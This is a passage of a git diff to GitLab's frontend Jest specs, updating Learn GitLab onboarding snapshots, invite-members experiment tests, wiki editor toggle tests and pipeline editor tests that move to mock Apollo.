class="gl-mb-4" > - <span> - <a - 
class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Set up CI/CD" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Set up CI/CD - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Set up CI/CD" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Set up CI/CD + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Start a free Ultimate trial" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Start a free Ultimate trial - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Start a free Ultimate trial" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Start a free Ultimate trial + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Add code owners" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Add code owners - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Add code owners" + 
data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Add code owners + + </a> <span class="gl-font-style-italic gl-text-gray-500" @@ -204,22 +200,20 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Add merge request approval" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Add merge request approval - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Add merge request approval" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Add merge request approval + + </a> <span class="gl-font-style-italic gl-text-gray-500" @@ -269,44 +263,40 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Create an issue" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Create an issue - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Create an issue" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Create an issue + + </a> <!----> </div> <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - 
data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Submit a merge request" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Submit a merge request - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Submit a merge request" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Submit a merge request + + </a> <!----> </div> @@ -349,22 +339,20 @@ exports[`Learn GitLab renders correctly 1`] = ` <div class="gl-mb-4" > - <span> - <a - class="gl-link" - data-track-action="click_link" - data-track-experiment="change_continuous_onboarding_link_urls" - data-track-label="Run a Security scan using CI/CD" - data-track-property="Growth::Conversion::Experiment::LearnGitLab" - href="http://example.com/" - rel="noopener noreferrer" - target="_blank" - > - - Run a Security scan using CI/CD - - </a> - </span> + <a + class="gl-link" + data-track-action="click_link" + data-track-experiment="change_continuous_onboarding_link_urls" + data-track-label="Run a Security scan using CI/CD" + data-track-property="Growth::Conversion::Experiment::LearnGitLab" + href="http://example.com/" + rel="noopener noreferrer" + target="_blank" + > + + Run a Security scan using CI/CD + + </a> <!----> </div> diff --git a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js index 882d233a239..f7b2154a935 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_section_link_spec.js @@ -1,4 +1,7 @@ import { shallowMount } from '@vue/test-utils'; 
+import { stubExperiments } from 'helpers/experimentation_helper'; +import { mockTracking, triggerEvent, unmockTracking } from 'helpers/tracking_helper'; +import eventHub from '~/invite_members/event_hub'; import LearnGitlabSectionLink from '~/pages/projects/learn_gitlab/components/learn_gitlab_section_link.vue'; const defaultAction = 'gitWrite'; @@ -23,6 +26,9 @@ describe('Learn GitLab Section Link', () => { }); }; + const openInviteMembesrModalLink = () => + wrapper.find('[data-testid="invite-for-help-continuous-onboarding-experiment-link"]'); + it('renders no icon when not completed', () => { createWrapper(undefined, { completed: false }); @@ -46,4 +52,54 @@ describe('Learn GitLab Section Link', () => { expect(wrapper.find('[data-testid="trial-only"]').exists()).toBe(true); }); + + describe('rendering a link to open the invite_members modal instead of a regular link', () => { + it.each` + action | experimentVariant | showModal + ${'userAdded'} | ${'candidate'} | ${true} + ${'userAdded'} | ${'control'} | ${false} + ${defaultAction} | ${'candidate'} | ${false} + ${defaultAction} | ${'control'} | ${false} + `( + 'when the invite_for_help_continuous_onboarding experiment has variant: $experimentVariant and action is $action, the modal link is shown: $showModal', + ({ action, experimentVariant, showModal }) => { + stubExperiments({ invite_for_help_continuous_onboarding: experimentVariant }); + createWrapper(action); + + expect(openInviteMembesrModalLink().exists()).toBe(showModal); + }, + ); + }); + + describe('clicking the link to open the invite_members modal', () => { + beforeEach(() => { + jest.spyOn(eventHub, '$emit').mockImplementation(); + + stubExperiments({ invite_for_help_continuous_onboarding: 'candidate' }); + createWrapper('userAdded'); + }); + + it('calls the eventHub', () => { + openInviteMembesrModalLink().vm.$emit('click'); + + expect(eventHub.$emit).toHaveBeenCalledWith('openModal', { + inviteeType: 'members', + source: 'learn_gitlab', + 
tasksToBeDoneEnabled: true, + }); + }); + + it('tracks the click', async () => { + const trackingSpy = mockTracking('_category_', wrapper.element, jest.spyOn); + + triggerEvent(openInviteMembesrModalLink().element); + + expect(trackingSpy).toHaveBeenCalledWith('_category_', 'click_link', { + label: 'Invite your colleagues', + property: 'Growth::Activation::Experiment::InviteForHelpContinuousOnboarding', + }); + + unmockTracking(); + }); + }); }); diff --git a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js index 7e97a539a99..7e71622770f 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/learn_gitlab_spec.js @@ -1,20 +1,35 @@ -import { GlProgressBar } from '@gitlab/ui'; +import { GlProgressBar, GlAlert } from '@gitlab/ui'; import { mount } from '@vue/test-utils'; import LearnGitlab from '~/pages/projects/learn_gitlab/components/learn_gitlab.vue'; import eventHub from '~/invite_members/event_hub'; -import { testActions, testSections } from './mock_data'; +import { testActions, testSections, testProject } from './mock_data'; describe('Learn GitLab', () => { let wrapper; + let sidebar; let inviteMembersOpen = false; const createWrapper = () => { wrapper = mount(LearnGitlab, { - propsData: { actions: testActions, sections: testSections, inviteMembersOpen }, + propsData: { + actions: testActions, + sections: testSections, + project: testProject, + inviteMembersOpen, + }, }); }; beforeEach(() => { + sidebar = document.createElement('div'); + sidebar.innerHTML = ` + <div class="sidebar-top-level-items"> + <div class="active"> + <div class="count"></div> + </div> + </div> + `; + document.body.appendChild(sidebar); createWrapper(); }); @@ -22,6 +37,7 @@ describe('Learn GitLab', () => { wrapper.destroy(); wrapper = null; inviteMembersOpen = false; + sidebar.remove(); }); it('renders 
correctly', () => { @@ -66,4 +82,26 @@ describe('Learn GitLab', () => { expect(spy).not.toHaveBeenCalled(); }); }); + + describe('when the showSuccessfulInvitationsAlert event is fired', () => { + const findAlert = () => wrapper.findComponent(GlAlert); + + beforeEach(() => { + eventHub.$emit('showSuccessfulInvitationsAlert'); + }); + + it('displays the successful invitations alert', () => { + expect(findAlert().exists()).toBe(true); + }); + + it('displays a message with the project name', () => { + expect(findAlert().text()).toBe( + "Your team is growing! You've successfully invited new team members to the test-project project.", + ); + }); + + it('modifies the sidebar percentage', () => { + expect(sidebar.textContent.trim()).toBe('22%'); + }); + }); }); diff --git a/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js b/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js index 8d6ac737db8..1e633cb7cf5 100644 --- a/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js +++ b/spec/frontend/pages/projects/learn_gitlab/components/mock_data.js @@ -57,3 +57,7 @@ export const testSections = { svg: 'plan.svg', }, }; + +export const testProject = { + name: 'test-project', +}; diff --git a/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js b/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js index 9d510b3d231..f4236146d33 100644 --- a/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js +++ b/spec/frontend/pages/shared/wikis/components/wiki_form_spec.js @@ -1,5 +1,6 @@ +import { nextTick } from 'vue'; import { GlLoadingIcon, GlModal } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; +import { mount, shallowMount } from '@vue/test-utils'; import axios from 'axios'; import MockAdapter from 'axios-mock-adapter'; import { mockTracking } from 'helpers/tracking_helper'; @@ -32,12 +33,15 @@ describe('WikiForm', () => { const findSubmitButton = () => wrapper.findByTestId('wiki-submit-button'); const 
findCancelButton = () => wrapper.findByRole('link', { name: 'Cancel' }); const findUseNewEditorButton = () => wrapper.findByRole('button', { name: 'Use the new editor' }); + const findToggleEditingModeButton = () => wrapper.findByTestId('toggle-editing-mode-button'); const findDismissContentEditorAlertButton = () => wrapper.findByRole('button', { name: 'Try this later' }); const findSwitchToOldEditorButton = () => wrapper.findByRole('button', { name: 'Switch me back to the classic editor.' }); - const findTitleHelpLink = () => wrapper.findByRole('link', { name: 'More Information.' }); + const findTitleHelpLink = () => wrapper.findByRole('link', { name: 'Learn more.' }); const findMarkdownHelpLink = () => wrapper.findByTestId('wiki-markdown-help-link'); + const findContentEditor = () => wrapper.findComponent(ContentEditor); + const findClassicEditor = () => wrapper.findComponent(MarkdownField); const setFormat = (value) => { const format = findFormat(); @@ -73,18 +77,24 @@ describe('WikiForm', () => { path: '/project/path/-/wikis/home', }; - function createWrapper(persisted = false, { pageInfo } = {}) { + const formatOptions = { + Markdown: 'markdown', + RDoc: 'rdoc', + AsciiDoc: 'asciidoc', + Org: 'org', + }; + + function createWrapper( + persisted = false, + { pageInfo, glFeatures = { wikiSwitchBetweenContentEditorRawMarkdown: false } } = {}, + ) { wrapper = extendedWrapper( mount( WikiForm, { provide: { - formatOptions: { - Markdown: 'markdown', - RDoc: 'rdoc', - AsciiDoc: 'asciidoc', - Org: 'org', - }, + formatOptions, + glFeatures, pageInfo: { ...(persisted ? pageInfoPersisted : pageInfoNew), ...pageInfo, @@ -96,6 +106,27 @@ describe('WikiForm', () => { ); } + const createShallowWrapper = ( + persisted = false, + { pageInfo, glFeatures = { wikiSwitchBetweenContentEditorRawMarkdown: false } } = {}, + ) => { + wrapper = extendedWrapper( + shallowMount(WikiForm, { + provide: { + formatOptions, + glFeatures, + pageInfo: { + ...(persisted ? 
pageInfoPersisted : pageInfoNew), + ...pageInfo, + }, + }, + stubs: { + MarkdownField, + }, + }), + ); + }; + beforeEach(() => { trackingSpy = mockTracking(undefined, null, jest.spyOn); mock = new MockAdapter(axios); @@ -193,14 +224,13 @@ describe('WikiForm', () => { }); describe('when wiki content is updated', () => { - beforeEach(() => { + beforeEach(async () => { createWrapper(true); const input = findContent(); input.setValue(' Lorem ipsum dolar sit! '); - input.element.dispatchEvent(new Event('input')); - return wrapper.vm.$nextTick(); + await input.trigger('input'); }); it('sets before unload warning', () => { @@ -279,6 +309,100 @@ describe('WikiForm', () => { ); }); + describe('when wikiSwitchBetweenContentEditorRawMarkdown feature flag is not enabled', () => { + beforeEach(() => { + createShallowWrapper(true, { + glFeatures: { wikiSwitchBetweenContentEditorRawMarkdown: false }, + }); + }); + + it('hides toggle editing mode button', () => { + expect(findToggleEditingModeButton().exists()).toBe(false); + }); + }); + + describe('when wikiSwitchBetweenContentEditorRawMarkdown feature flag is enabled', () => { + beforeEach(() => { + createShallowWrapper(true, { + glFeatures: { wikiSwitchBetweenContentEditorRawMarkdown: true }, + }); + }); + + it('hides gl-alert containing "use new editor" button', () => { + expect(findUseNewEditorButton().exists()).toBe(false); + }); + + it('displays toggle editing mode button', () => { + expect(findToggleEditingModeButton().exists()).toBe(true); + }); + + describe('when content editor is not active', () => { + it('displays "Edit rich text" label in the toggle editing mode button', () => { + expect(findToggleEditingModeButton().text()).toBe('Edit rich text'); + }); + + describe('when clicking the toggle editing mode button', () => { + beforeEach(() => { + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides the classic editor', () => { + expect(findClassicEditor().exists()).toBe(false); + }); + + it('hides the 
content editor', () => { + expect(findContentEditor().exists()).toBe(true); + }); + }); + }); + + describe('when content editor is active', () => { + let mockContentEditor; + + beforeEach(() => { + mockContentEditor = { + getSerializedContent: jest.fn(), + setSerializedContent: jest.fn(), + }; + + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides switch to old editor button', () => { + expect(findSwitchToOldEditorButton().exists()).toBe(false); + }); + + it('displays "Edit source" label in the toggle editing mode button', () => { + expect(findToggleEditingModeButton().text()).toBe('Edit source'); + }); + + describe('when clicking the toggle editing mode button', () => { + const contentEditorFakeSerializedContent = 'fake content'; + + beforeEach(() => { + mockContentEditor.getSerializedContent.mockReturnValueOnce( + contentEditorFakeSerializedContent, + ); + + findContentEditor().vm.$emit('initialized', mockContentEditor); + findToggleEditingModeButton().vm.$emit('click'); + }); + + it('hides the content editor', () => { + expect(findContentEditor().exists()).toBe(false); + }); + + it('displays the classic editor', () => { + expect(findClassicEditor().exists()).toBe(true); + }); + + it('updates the classic editor content field', () => { + expect(findContent().element.value).toBe(contentEditorFakeSerializedContent); + }); + }); + }); + }); + describe('wiki content editor', () => { beforeEach(() => { createWrapper(true); @@ -306,8 +430,8 @@ describe('WikiForm', () => { }); const assertOldEditorIsVisible = () => { - expect(wrapper.findComponent(ContentEditor).exists()).toBe(false); - expect(wrapper.findComponent(MarkdownField).exists()).toBe(true); + expect(findContentEditor().exists()).toBe(false); + expect(findClassicEditor().exists()).toBe(true); expect(findSubmitButton().props('disabled')).toBe(false); expect(wrapper.text()).not.toContain( @@ -376,10 +500,6 @@ describe('WikiForm', () => { findUseNewEditorButton().trigger('click'); }); - it('shows 
a loading indicator for the rich text editor', () => { - expect(wrapper.findComponent(GlLoadingIcon).exists()).toBe(true); - }); - it('shows a tip to send feedback', () => { expect(wrapper.text()).toContain('Tell us your experiences with the new Markdown editor'); }); @@ -412,16 +532,8 @@ describe('WikiForm', () => { }); describe('when wiki content is updated', () => { - beforeEach(async () => { - // wait for content editor to load - await waitForPromises(); - - wrapper.vm.contentEditor.tiptapEditor.commands.setContent( - '<p>hello __world__ from content editor</p>', - true, - ); - - return wrapper.vm.$nextTick(); + beforeEach(() => { + findContentEditor().vm.$emit('change', { empty: false }); }); it('sets before unload warning', () => { @@ -432,7 +544,7 @@ describe('WikiForm', () => { it('unsets before unload warning on form submit', async () => { triggerFormSubmit(); - await wrapper.vm.$nextTick(); + await nextTick(); const e = dispatchBeforeUnload(); expect(e.preventDefault).not.toHaveBeenCalled(); @@ -450,8 +562,8 @@ describe('WikiForm', () => { expect(trackingSpy).toHaveBeenCalledWith(undefined, WIKI_FORMAT_UPDATED_ACTION, { label: WIKI_FORMAT_LABEL, - value: findFormat().element.value, extra: { + value: findFormat().element.value, old_format: pageInfoPersisted.format, project_path: pageInfoPersisted.path, }, diff --git a/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js b/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js index 23219042008..7244a179820 100644 --- a/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js +++ b/spec/frontend/pipeline_editor/components/commit/commit_form_spec.js @@ -1,3 +1,4 @@ +import { nextTick } from 'vue'; import { GlFormInput, GlFormTextarea } from '@gitlab/ui'; import { shallowMount, mount } from '@vue/test-utils'; @@ -32,7 +33,6 @@ describe('Pipeline Editor | Commit Form', () => { afterEach(() => { wrapper.destroy(); - wrapper = null; }); describe('when the form is 
displayed', () => { @@ -78,7 +78,7 @@ describe('Pipeline Editor | Commit Form', () => { it('emits an event when the form resets', () => { findCancelBtn().trigger('click'); - expect(wrapper.emitted('cancel')).toHaveLength(1); + expect(wrapper.emitted('resetContent')).toHaveLength(1); }); }); @@ -121,7 +121,7 @@ describe('Pipeline Editor | Commit Form', () => { beforeEach(async () => { createComponent(); wrapper.setProps({ scrollToCommitForm: true }); - await wrapper.vm.$nextTick(); + await nextTick(); }); it('scrolls into view', () => { diff --git a/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js b/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js index efc345d8877..bc77b7045eb 100644 --- a/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js +++ b/spec/frontend/pipeline_editor/components/commit/commit_section_spec.js @@ -1,5 +1,7 @@ +import VueApollo from 'vue-apollo'; import { GlFormTextarea, GlFormInput, GlLoadingIcon } from '@gitlab/ui'; -import { mount } from '@vue/test-utils'; +import { createLocalVue, mount } from '@vue/test-utils'; +import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import { objectToQuery, redirectTo } from '~/lib/utils/url_utility'; import CommitForm from '~/pipeline_editor/components/commit/commit_form.vue'; @@ -10,18 +12,22 @@ import { COMMIT_SUCCESS, } from '~/pipeline_editor/constants'; import commitCreate from '~/pipeline_editor/graphql/mutations/commit_ci_file.mutation.graphql'; +import updatePipelineEtag from '~/pipeline_editor/graphql/mutations/client/update_pipeline_etag.mutation.graphql'; import { mockCiConfigPath, mockCiYml, + mockCommitCreateResponse, + mockCommitCreateResponseNewEtag, mockCommitSha, - mockCommitNextSha, mockCommitMessage, mockDefaultBranch, mockProjectFullPath, mockNewMergeRequestPath, } from '../../mock_data'; +const localVue = createLocalVue(); + jest.mock('~/lib/utils/url_utility', 
() => ({ redirectTo: jest.fn(), refreshCurrentPage: jest.fn(), @@ -47,7 +53,8 @@ const mockProvide = { describe('Pipeline Editor | Commit section', () => { let wrapper; - let mockMutate; + let mockApollo; + const mockMutateCommitData = jest.fn(); const defaultProps = { ciFileContent: mockCiYml, @@ -55,18 +62,7 @@ describe('Pipeline Editor | Commit section', () => { isNewCiConfigFile: false, }; - const createComponent = ({ props = {}, options = {}, provide = {} } = {}) => { - mockMutate = jest.fn().mockResolvedValue({ - data: { - commitCreate: { - errors: [], - commit: { - sha: mockCommitNextSha, - }, - }, - }, - }); - + const createComponent = ({ apolloConfig = {}, props = {}, options = {}, provide = {} } = {}) => { wrapper = mount(CommitSection, { propsData: { ...defaultProps, ...props }, provide: { ...mockProvide, ...provide }, @@ -75,16 +71,25 @@ describe('Pipeline Editor | Commit section', () => { currentBranch: mockDefaultBranch, }; }, - mocks: { - $apollo: { - mutate: mockMutate, - }, - }, attachTo: document.body, + ...apolloConfig, ...options, }); }; + const createComponentWithApollo = (options) => { + const handlers = [[commitCreate, mockMutateCommitData]]; + localVue.use(VueApollo); + mockApollo = createMockApollo(handlers); + + const apolloConfig = { + localVue, + apolloProvider: mockApollo, + }; + + createComponent({ ...options, apolloConfig }); + }; + const findCommitForm = () => wrapper.findComponent(CommitForm); const findCommitBtnLoadingIcon = () => wrapper.find('[type="submit"]').findComponent(GlLoadingIcon); @@ -103,72 +108,54 @@ describe('Pipeline Editor | Commit section', () => { await waitForPromises(); }; - const cancelCommitForm = async () => { - const findCancelBtn = () => wrapper.find('[type="reset"]'); - await findCancelBtn().trigger('click'); - }; - afterEach(() => { - mockMutate.mockReset(); wrapper.destroy(); }); describe('when the user commits a new file', () => { beforeEach(async () => { - createComponent({ props: { isNewCiConfigFile: 
true } }); + mockMutateCommitData.mockResolvedValue(mockCommitCreateResponse); + createComponentWithApollo({ props: { isNewCiConfigFile: true } }); await submitCommit(); }); it('calls the mutation with the CREATE action', () => { - // the extra calls are for updating client queries (currentBranch and lastCommitBranch) - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - action: COMMIT_ACTION_CREATE, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + action: COMMIT_ACTION_CREATE, + branch: mockDefaultBranch, }); }); }); describe('when the user commits an update to an existing file', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit(); }); it('calls the mutation with the UPDATE action', () => { - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - action: COMMIT_ACTION_UPDATE, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + action: COMMIT_ACTION_UPDATE, + branch: mockDefaultBranch, }); }); }); describe('when the user commits changes to the current branch', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit(); }); it('calls the mutation with the current branch', () => { - expect(mockMutate).toHaveBeenCalledTimes(3); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(1); + 
expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: mockDefaultBranch, }); }); @@ -188,14 +175,10 @@ describe('Pipeline Editor | Commit section', () => { it('a second commit submits the latest sha, keeping the form updated', async () => { await submitCommit(); - expect(mockMutate).toHaveBeenCalledTimes(6); - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: mockDefaultBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledTimes(2); + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: mockDefaultBranch, }); }); }); @@ -204,20 +187,16 @@ describe('Pipeline Editor | Commit section', () => { const newBranch = 'new-branch'; beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit({ branch: newBranch, }); }); it('calls the mutation with the new branch', () => { - expect(mockMutate).toHaveBeenCalledWith({ - mutation: commitCreate, - update: expect.any(Function), - variables: { - ...mockVariables, - branch: newBranch, - }, + expect(mockMutateCommitData).toHaveBeenCalledWith({ + ...mockVariables, + branch: newBranch, }); }); @@ -230,7 +209,7 @@ describe('Pipeline Editor | Commit section', () => { const newBranch = 'new-branch'; beforeEach(async () => { - createComponent(); + createComponentWithApollo(); await submitCommit({ branch: newBranch, openMergeRequest: true, @@ -249,11 +228,11 @@ describe('Pipeline Editor | Commit section', () => { describe('when the commit is ocurring', () => { beforeEach(() => { - createComponent(); + createComponentWithApollo(); }); it('shows a saving state', async () => { - mockMutate.mockImplementationOnce(() => { + mockMutateCommitData.mockImplementationOnce(() => { expect(findCommitBtnLoadingIcon().exists()).toBe(true); return Promise.resolve(); }); @@ -266,15 +245,23 @@ describe('Pipeline Editor | Commit section', () => { }); }); - 
describe('when the commit form is cancelled', () => { + describe('when the commit returns a different etag path', () => { beforeEach(async () => { - createComponent(); + createComponentWithApollo(); + jest.spyOn(wrapper.vm.$apollo, 'mutate'); + mockMutateCommitData.mockResolvedValue(mockCommitCreateResponseNewEtag); + await submitCommit(); }); - it('emits an event so that it cab be reseted', async () => { - await cancelCommitForm(); - - expect(wrapper.emitted('resetContent')).toHaveLength(1); + it('calls the client mutation to update the etag', () => { + // 1:Commit submission, 2:etag update, 3:currentBranch update, 4:lastCommit update + expect(wrapper.vm.$apollo.mutate).toHaveBeenCalledTimes(4); + expect(wrapper.vm.$apollo.mutate).toHaveBeenNthCalledWith(2, { + mutation: updatePipelineEtag, + variables: { + pipelineEtag: mockCommitCreateResponseNewEtag.data.commitCreate.commitPipelinePath, + }, + }); }); }); diff --git a/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js b/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js index a43da4b0f19..cab4810cbf1 100644 --- a/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js +++ b/spec/frontend/pipeline_editor/components/editor/text_editor_spec.js @@ -1,7 +1,6 @@ import { shallowMount } from '@vue/test-utils'; import { EDITOR_READY_EVENT } from '~/editor/constants'; -import { SourceEditorExtension } from '~/editor/extensions/source_editor_extension_base'; import TextEditor from '~/pipeline_editor/components/editor/text_editor.vue'; import { mockCiConfigPath, @@ -59,10 +58,6 @@ describe('Pipeline Editor | Text editor component', () => { const findEditor = () => wrapper.findComponent(MockSourceEditor); - beforeEach(() => { - SourceEditorExtension.deferRerender = jest.fn(); - }); - afterEach(() => { wrapper.destroy(); diff --git a/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js 
b/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js index 6532c4e289d..ab9027a56a4 100644 --- a/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js +++ b/spec/frontend/pipeline_editor/components/file-nav/branch_switcher_spec.js @@ -11,7 +11,7 @@ import createMockApollo from 'helpers/mock_apollo_helper'; import waitForPromises from 'helpers/wait_for_promises'; import BranchSwitcher from '~/pipeline_editor/components/file_nav/branch_switcher.vue'; import { DEFAULT_FAILURE } from '~/pipeline_editor/constants'; -import getAvailableBranchesQuery from '~/pipeline_editor/graphql/queries/available_branches.graphql'; +import getAvailableBranchesQuery from '~/pipeline_editor/graphql/queries/available_branches.query.graphql'; import { mockBranchPaginationLimit, mockDefaultBranch, @@ -22,7 +22,6 @@ import { mockTotalBranches, mockTotalBranchResults, mockTotalSearchResults, - mockNewBranch, } from '../../mock_data'; const localVue = createLocalVue(); @@ -32,18 +31,14 @@ describe('Pipeline editor branch switcher', () => { let wrapper; let mockApollo; let mockAvailableBranchQuery; - let mockCurrentBranchQuery; - let mockLastCommitBranchQuery; - - const createComponent = ( - { currentBranch, isQueryLoading, mountFn, options, props } = { - currentBranch: mockDefaultBranch, - hasUnsavedChanges: false, - isQueryLoading: false, - mountFn: shallowMount, - options: {}, - }, - ) => { + + const createComponent = ({ + currentBranch = mockDefaultBranch, + isQueryLoading = false, + mountFn = shallowMount, + options = {}, + props = {}, + } = {}) => { wrapper = mountFn(BranchSwitcher, { propsData: { ...props, @@ -74,17 +69,7 @@ describe('Pipeline editor branch switcher', () => { const createComponentWithApollo = ({ mountFn = shallowMount, props = {} } = {}) => { const handlers = [[getAvailableBranchesQuery, mockAvailableBranchQuery]]; - const resolvers = { - Query: { - currentBranch() { - return mockCurrentBranchQuery(); - }, - lastCommitBranch() { 
- return mockLastCommitBranchQuery(); - }, - }, - }; - mockApollo = createMockApollo(handlers, resolvers); + mockApollo = createMockApollo(handlers); createComponent({ mountFn, @@ -104,22 +89,12 @@ describe('Pipeline editor branch switcher', () => { const findInfiniteScroll = () => wrapper.findComponent(GlInfiniteScroll); const defaultBranchInDropdown = () => findDropdownItems().at(0); - const setMockResolvedValues = ({ availableBranches, currentBranch, lastCommitBranch }) => { - if (availableBranches) { - mockAvailableBranchQuery.mockResolvedValue(availableBranches); - } - - if (currentBranch) { - mockCurrentBranchQuery.mockResolvedValue(currentBranch); - } - - mockLastCommitBranchQuery.mockResolvedValue(lastCommitBranch || ''); + const setAvailableBranchesMock = (availableBranches) => { + mockAvailableBranchQuery.mockResolvedValue(availableBranches); }; beforeEach(() => { mockAvailableBranchQuery = jest.fn(); - mockCurrentBranchQuery = jest.fn(); - mockLastCommitBranchQuery = jest.fn(); }); afterEach(() => { @@ -148,10 +123,7 @@ describe('Pipeline editor branch switcher', () => { describe('after querying', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: mockProjectBranches, - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(mockProjectBranches); createComponentWithApollo({ mountFn: mount }); await waitForPromises(); }); @@ -180,10 +152,7 @@ describe('Pipeline editor branch switcher', () => { describe('on fetch error', () => { beforeEach(async () => { - setMockResolvedValues({ - availableBranches: new Error(), - currentBranch: mockDefaultBranch, - }); + setAvailableBranchesMock(new Error()); createComponentWithApollo(); await waitForPromises(); }); @@ -200,10 +169,7 @@ describe('Pipeline editor branch switcher', () => { describe('when switching branches', () => { beforeEach(async () => { jest.spyOn(window.history, 'pushState').mockImplementation(() => {}); - setMockResolvedValues({ - availableBranches: 
